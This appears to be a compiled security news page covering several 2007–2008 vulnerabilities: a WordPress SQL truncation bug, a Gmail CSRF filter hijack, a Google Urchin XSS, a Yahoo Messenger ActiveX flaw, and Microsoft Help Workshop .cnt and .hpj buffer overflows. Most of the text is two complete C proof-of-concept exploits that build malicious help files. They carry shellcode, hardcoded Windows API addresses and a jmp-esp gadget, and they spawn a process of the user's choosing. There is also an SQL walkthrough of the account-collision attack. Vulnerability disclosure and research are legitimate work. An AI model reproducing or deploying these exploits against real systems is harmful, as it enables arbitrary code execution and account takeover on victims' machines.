WordPress 2.6.1 has an SQL truncation vulnerability
2008-09-08 20:10:18. Update: WordPress 2.6.2 fixes this vulnerability; download it here.
WordPress 2.6.1 has been found to contain an SQL truncation vulnerability. If the site has user registration enabled, a remote attacker can use it to obtain the administrator's password.
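The mechanism behind an SQL truncation bug, shown as an added example that is not from the original post and not WordPress's own code: the application checks whether a username is taken using the raw input, but the database silently cuts the stored value down to the column width, and a PAD SPACE collation then treats the truncated value and the real username as equal. The table, column names, the 60-character limit and the e-mail addresses below are assumptions for the illustration; it needs a MySQL server, and on MySQL 8 the explicit collation and the sql_mode change are both required because the defaults there are NO PAD and strict mode.

```sql
-- 1. Weak setting: non-strict mode silently truncates over-long values
--    (MySQL 8 enables STRICT_TRANS_TABLES by default; 5.x installs of the era did not).
SET SESSION sql_mode = '';

CREATE TABLE demo_users (
  id         INT AUTO_INCREMENT PRIMARY KEY,
  user_login VARCHAR(60)  NOT NULL,
  user_email VARCHAR(100) NOT NULL,
  KEY user_login_key (user_login)            -- indexed, but deliberately not UNIQUE
) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;  -- PAD SPACE collation: trailing spaces are ignored when comparing

INSERT INTO demo_users (user_login, user_email) VALUES ('admin', 'owner@example.com');

-- 2. The "is this name taken?" check runs against the attacker's raw input.
--    'admin' + 55 spaces + 'x' is 61 characters and is not equal to 'admin', so it passes.
SELECT COUNT(*) AS already_taken
  FROM demo_users
 WHERE user_login = CONCAT('admin', REPEAT(' ', 55), 'x');    -- 0

-- 3. The INSERT keeps only the first 60 characters: 'admin' followed by 55 spaces.
--    Non-strict mode reports warning 1265 (Data truncated) instead of failing.
INSERT INTO demo_users (user_login, user_email)
VALUES (CONCAT('admin', REPEAT(' ', 55), 'x'), 'attacker@example.com');
SHOW WARNINGS;

-- 4. Any later lookup keyed on the attacker's stored login now matches BOTH rows,
--    because under PAD SPACE 'admin' = 'admin<55 spaces>'. An UPDATE with the same
--    WHERE clause (for example, writing a password-reset key) touches the admin row too.
SELECT id, user_email, LENGTH(user_login) AS stored_len
  FROM demo_users
 WHERE user_login = (SELECT user_login FROM demo_users WHERE user_email = 'attacker@example.com');
-- returns id 1 (owner@example.com) and id 2 (attacker@example.com)

-- 5. Hardened setting: strict mode turns the truncation into an error, so the
--    colliding row is never created.
SET SESSION sql_mode = 'STRICT_ALL_TABLES';
INSERT INTO demo_users (user_login, user_email)
VALUES (CONCAT('admin', REPEAT(' ', 55), 'x'), 'attacker2@example.com');
-- ERROR 1406 (22001): Data too long for column 'user_login' at row 1
```

Strict mode alone is a database-side safety net; the application should also reject logins longer than the column, trim trailing whitespace before both the existence check and the INSERT, and key privileged updates on the numeric user id rather than on the login string.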

pdp of GnuCitizen claims to have found a CSRF vulnerability in Google Gmail: an attacker can build an arbitrary malicious web page which, when viewed by a user who is logged in to Gmail at the time, writes rules into the user's Gmail filters and thereby hijacks (monitors) the user's e-mail.
Details are on the author's site:
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
Another blogger has also posted a demonstration (with proof-of-concept code) of exploiting some Google vulnerabilities to the same effect; see:
http://blog.beford.org/?p=3 (Warning: do not open the demonstration links on that blog while you are logged in to Gmail, or your e-mail will be forwarded to the author's mailbox. To test it, create a fresh Gmail account, preferably from an isolated environment.)

Adrian Pastor of GnuCitizen found an XSS vulnerability in Google Urchin that lets an attacker reach the Urchin administration page without logging in with an account and password. The vulnerability can be used in phishing attacks.
Proof-of-concept code:
Further proof-of-concept code and a demonstration video are at:
http://www.gnucitizen.org/blog/google-urchin-password-theft-madness
http://www.youtube.com/v/wCUovL9WLVQ
RSnake also demonstrates the vulnerability against a site on his blog (the screenshot is not reproduced here).

Yahoo! Messenger (version 8.1.0.421) has again been found to contain a vulnerability in the CYFT ActiveX control (ft60.dll) that lets a remote attacker open an arbitrary file or program on the client system.
The flaw is that the control's GetFile() method does not validate the parameters passed to it, so a remote attacker can feed Messenger arbitrary malicious input and infect the system.
Proof-of-concept code for those interested:
http://www.milw0rm.com/exploits/4428
http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html
Yahoo! Messenger update information:
http://tw.messenger.yahoo.com/index.php
http://messenger.yahoo.com/
Microsoft Help Workshop suffers a stack-based memory corruption when processing Help Contents Files (.CNT), which may let an attacker execute arbitrary code. Proof-of-concept (PoC) code is already available on some sites.
Affected software:
Microsoft Help Workshop v4.03.0002
Microsoft Visual Studio 6.0 SP6
Microsoft Visual Studio 2003 (.Net)
Discovered by:
porkythepig (porkythepig@anspi.pl)
The PoC can be downloaded from milw0rm or read below (encoding damage from the web page repaired: the hex constants and string quotes were mangled, and the spaces in STR01 that fix the shellcode position had been collapsed):
/////////////////////////////////////////////////////////////
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"

/* Title line that opens the .cnt file. The shellcode is copied right after it,
   so its length fixes every offset below: the *_OFFSET values and the backward
   jump in backSeq (0x218 + 5 - 0x1e5 = 0x38) only line up when STR01 is 56
   bytes long. The web page collapsed runs of spaces, so three trailing spaces
   are restored here. */
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig    "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619             /* size of the generated .cnt file */
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210          /* saved return address -> "jmp esp" gadget */
#define PROC_NAME_OFFSET 0x228    /* command line of the process to spawn */
#define BACK_SEQ_OFFSET 0x218     /* landing spot: jmp back to the shellcode start */
#define EXPRO_OFFSET 0xbf         /* patch points for the four API addresses */
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65

/* Absolute kernel32 addresses for one specific Windows build each (no ASLR on
   these systems) plus the address of a "jmp esp" instruction used as the
   return address. Per the field names: ExitProcess, GetStartupInfo,
   CreateProcess, GetWindowsDirectory. On any other build the PoC only crashes. */
typedef struct
{
    unsigned int extPro;
    unsigned int getStarInf;
    unsigned int crePro;
    unsigned int getWinDir;
    unsigned int jmpEspPtr;
} ApiPtrs;

ApiPtrs osApiPtrs[5]=
{
    {0x793f69da,0x793f6b7a,0x793f5010,0x793f2d23,0x7cfdbd1b},
    {0x7c4ee01a,0x7c4f49df,0x7c4fc0a0,0x7c4e9cFF,0x784452e4},
    {0x7c5969da,0x7c596b7a,0x7c595010,0x7c592d23,0x7d0812e4},
    {0x7c81cdda,0x7c801eee,0x7c802367,0x7c821363,0x7cc58fd8},
    {0x77e75cb5,0x77e6177a,0x77e61bb8,0x77e705b0,0x775e6247}
};

/* 141-byte shellcode: GetStartupInfo, GetWindowsDirectory, CreateProcess on the
   string found at PROC_NAME_OFFSET (terminated by a space), then ExitProcess.
   The immediates embedded here are the osId 0 addresses; CompileBuffer()
   overwrites them at the *_OFFSET patch points with the selected OS's values. */
unsigned char shlCode[]=
{
    0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,
    0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,
    0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,
    0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,
    0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,
    0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,
    0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,
    0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,
    0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,
    0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,
    0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,
    0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,
    0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,
    0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,
    0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,
    0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,
    0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,
    0x69,0x3f,0x79,0xff,0xd0
};

/* jmp -0x1e5: executed after "jmp esp", transfers control back to the shellcode */
unsigned char backSeq[]=
{
    0xe9,0x1b,0xfe,0xff,0xff
};

char buf0[EXPL_SIZE];
char spawnProcess[PROC_NAM_SIZ];
char *outName;
int osId;
int defProc;

/* Lay out the malicious .cnt: title, shellcode, filler, return address,
   backward jump, and the command line to spawn. */
void CompileBuffer()
{
    int ptr=0;
    memset(buf0,'1',EXPL_SIZE);
    ptr+=sprintf(buf0,"%s",STR01);
    memcpy(buf0+ptr,shlCode,sizeof(shlCode));
    memcpy(buf0+BACK_SEQ_OFFSET,backSeq,sizeof(backSeq));
    *((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;
    *((unsigned int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
    *((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
    *((unsigned int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
    *((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;
    ptr=PROC_NAME_OFFSET;
    if(!defProc)
    {
        buf0[ptr]=32;
        ptr++;
    }
    sprintf(buf0+ptr,"%s",spawnProcess);
    printf("Exploit buffer compiled\n");
}

void WriteBuffer()
{
    FILE *o;
    o=fopen(outName,"wb");
    if(o==NULL)
    {
        printf("Cannot open file for writing\n");
        exit(0);
    }
    fwrite(buf0,EXPL_SIZE,1,o);
    fclose(o);
    printf("Output .cnt file [ %s ] built successfully\n",outName);
}

void ProcessInput(int argc, char* argv[])
{
    printf("\nMicrosoft Help Workshop 4.03.0002 .cnt files exploit\n");
    printf("Vulnerability found & exploit built by porkythepig\n");
    if(argc<3)
    {
        printf("Syntax: exploit.exe os outName [spawnProc]\n");
        printf("[ os ] host OS, possible choices:\n");
        printf(" 0 Windows 2000 SP4 [Polish] updates on 11.01.2007\n");
        printf(" 1 Windows 2000 SP4 [English]\n");
        printf(" 2 Windows 2000 SP4 [English] updates on 11.01.2007\n");
        printf(" 3 Windows XP Pro SP2 [English] updates on 11.01.2007\n");
        printf(" 4 Windows XP Pro [English]\n");
        printf("[ outName ] output .cnt exploit file name\n");
        printf("[ spawnProc ] *optional* full path to the process to be spawned by\n");
        printf(" the exploit (if none specified default will be notepad.exe)\n");
        exit(0);
    }
    osId=atol(argv[1]);
    if((osId<0)||(osId>4))
    {
        exit(0);
    }
    outName=argv[2];
    if(argc>3)
    {
        if(strlen(argv[3])>=PROC_NAM_SIZ)
        {
            exit(0);
        }
        strcpy(spawnProcess,argv[3]);
        defProc=0;
    }
    else
    {
        strcpy(spawnProcess,DEF_SPAWNED_PROCESS);
        defProc=1;
    }
}

int main(int argc, char* argv[])
{
    ProcessInput(argc,argv);
    CompileBuffer();
    WriteBuffer();
    return 0;
}
Microsoft Help Workshop also suffers a stack-based memory corruption when processing Help Project Files (.HPJ), because it does not bounds-check the input values; an attacker may be able to use it to execute arbitrary code. Proof-of-concept (PoC) code is already available on some sites.
Affected software:
Microsoft Help Workshop v4.03.0002
Microsoft Visual Studio 6.0 SP6
Microsoft Visual Studio 2003 (.Net)
Discovered by:
porkythepig (porkythepig@anspi.pl)
The PoC can be downloaded from the author's site or read below (hex constants and string quotes mangled by the web page's encoding have been repaired):
//////////////////////////////////////////////
//*****************
//
// PoC exploit for (.HPJ) project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"

/* Comment line placed at the top of the .hpj; the file header built around it in
   CompileBuffer() is 70 bytes (0x46), which is where the shellcode starts and
   what the *_OFFSET values below are measured against. */
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671             /* size of the generated .hpj file */
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e          /* saved return address -> "jmp esp" gadget */
#define PROC_NAME_OFFSET 0x166    /* command line of the process to spawn */
#define EXPRO_OFFSET 0xd9         /* patch points for the four API addresses */
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73

/* Absolute kernel32 addresses for one specific Windows build each plus a
   "jmp esp" gadget address; same layout and caveat as in the .cnt PoC. */
typedef struct
{
    unsigned int extPro;
    unsigned int getStarInf;
    unsigned int crePro;
    unsigned int getWinDir;
    unsigned int jmpEspPtr;
} ApiPtrs;

ApiPtrs osApiPtrs[5]=
{
    {0x793f69da,0x793f6b7a,0x793f5010,0x793f2d23,0x793d1c8b},
    {0x7c4ee01a,0x7c4f49df,0x7c4fc0a0,0x7c4e9cFF,0x7ffd2d63},
    {0x7c5969da,0x7c596b7a,0x7c595010,0x7c592d23,0x7d0c65f1},
    {0x7c81cdda,0x7c801eee,0x7c802367,0x7c821363,0x7cb97b75},
    {0x77e75cb5,0x77e6177a,0x77e61bb8,0x77e705b0,0x775fe310}
};

/* Shellcode: same sequence as the .cnt PoC, but the spawned command line is
   terminated by a 0x01 byte (see the "%s\x01" below) instead of a space.
   The embedded immediates are the osId 0 addresses and are patched in
   CompileBuffer() for the selected OS. */
unsigned char shlCode[]=
{
    0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,
    0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,
    0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,
    0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,
    0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,
    0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,
    0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,
    0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,
    0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,
    0x5b,0x53,0xb2,0x01,0xb1,0x5c,0x88,0x08,
    0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,
    0x08,0x43,0x40,0xeb,0xf4,0xb2,0x01,0x88,
    0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,
    0x40,0x8b,0xd0,0x80,0x38,0x01,0x74,0x03,
    0x40,0xeb,0xf8,0x32,0xc9,0x88,0x08,0x58,
    0x50,0x66,0x2d,0x11,0x11,0x50,0x33,0xc9,
    0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x52,
    0xb8,0x10,0x50,0x3f,0x79,0xff,0xd0,0x33,
    0xc0,0x50,0xb8,0xda,0x69,0x3f,0x79,0xff,
    0xd0
};

char buf0[EXPL_SIZE];
char spawnProcess[PROC_NAM_SIZ];
char *outName;
int osId;
int defProc;

/* Lay out the malicious .hpj: an [OPTIONS] section whose over-long HLP= value
   carries the shellcode, filler, the return address and the command line. */
void CompileBuffer()
{
    int ptr=0;
    memset(buf0,'1',EXPL_SIZE);
    ptr+=sprintf(buf0,";%s\r\n\r\n[OPTIONS]\r\nHLP=",STR01);
    memcpy(buf0+ptr,shlCode,sizeof(shlCode));
    *((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;
    *((unsigned int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
    *((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
    *((unsigned int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
    *((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;
    ptr=PROC_NAME_OFFSET;
    if(!defProc)
    {
        buf0[ptr]=32;
        ptr++;
    }
    sprintf(buf0+ptr,"%s\x01",spawnProcess);   /* 0x01 terminates the command line for the shellcode */
    buf0[EXPL_SIZE-2]='\\';
    printf("Exploit buffer compiled\n");
}

void WriteBuffer()
{
    FILE *o;
    o=fopen(outName,"wb");
    if(o==NULL)
    {
        printf("Cannot open file for writing\n");
        exit(0);
    }
    fwrite(buf0,EXPL_SIZE,1,o);
    fclose(o);
    printf("Output .hpj file [ %s ] built successfully\n",outName);
}

void ProcessInput(int argc, char* argv[])
{
    printf("\nMicrosoft Help Workshop 4.03.0002 .HPJ Project file exploit\n");
    printf("Vulnerability found & exploit built by porkythepig\n");
    if(argc<3)
    {
        printf("Syntax: exploit.exe os outName [spawnProc]\n");
        printf("[os] host OS, possible choices:\n");
        printf(" 0 Windows 2000 SP4 [Polish] updates-04012007\n");
        printf(" 1 Windows 2000 SP4 [English]\n");
        printf(" 2 Windows 2000 SP4 [English] updates-04012007\n");
        printf(" 3 Windows XP Pro SP2 [English] updates-04012007\n");
        printf(" 4 Windows XP Pro [English]\n");
        printf("[outName] output .hpj exploit file name\n");
        printf("[spawnProc] *optional* full path to the process to be spawned by\n");
        printf(" the exploit (if none specified default will be notepad.exe)\n");
        exit(0);
    }
    osId=atol(argv[1]);
    if((osId<0)||(osId>4))
    {
        exit(0);
    }
    outName=argv[2];
    if(argc>3)
    {
        if(strlen(argv[3])>=PROC_NAM_SIZ)
        {
            exit(0);
        }
        strcpy(spawnProcess,argv[3]);
        defProc=0;
    }
    else
    {
        strcpy(spawnProcess,DEF_SPAWNED_PROCESS);
        defProc=1;
    }
}

int main(int argc, char* argv[])
{
    ProcessInput(argc,argv);
    CompileBuffer();
    WriteBuffer();
    return 0;
}